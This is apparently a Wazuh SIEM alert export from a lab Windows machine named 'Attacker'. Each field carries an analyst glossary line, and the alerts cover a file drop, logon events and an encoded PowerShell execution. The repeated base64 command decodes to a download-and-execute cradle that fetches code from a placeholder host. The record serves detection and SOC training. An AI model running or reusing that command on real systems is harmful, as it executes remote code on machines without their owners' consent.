data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd13-680a-340b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:15.558+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:15.558+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  51
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534235.1348677
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:12.9778604Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283516
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:12.860 ProcessGuid: {94294ddc-bd16-680a-360b-000000000e00} ProcessId: 13184 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yudgrlaq.1ii.ps1 CreationUtcTime: 2025-04-24 22:37:12.860 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:12.860
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd16-680a-360b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13184
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yudgrlaq.1ii.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:12.860
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:37:16.846+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:16.846+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  53
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534236.1351446
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:14.0705092Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43838
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. 
- Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Length of the session key negotiated at logon (e.g., 128‑bit). 0 means no session key was requested, which is normal for local service logons like this one; an unexpectedly short non‑zero key can point at a protocol downgrade.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:37:16.881+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:16.881+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  54
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534236.1358783
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:14.2143896Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43840
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. 
- Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Length of the session key negotiated at logon (e.g., 128‑bit). 0 means no session key was requested, which is normal for local service logons like this one; an unexpectedly short non‑zero key can point at a protocol downgrade.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:17.917+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:17.917+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  48
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534237.1366120
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:15.3032370Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283548
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:13.983 ProcessGuid: {94294ddc-bd19-680a-380b-000000000e00} ProcessId: 14056 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd16-680a-360b-000000000e00} ParentProcessId: 13184 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:13.983
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd19-680a-380b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14056
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

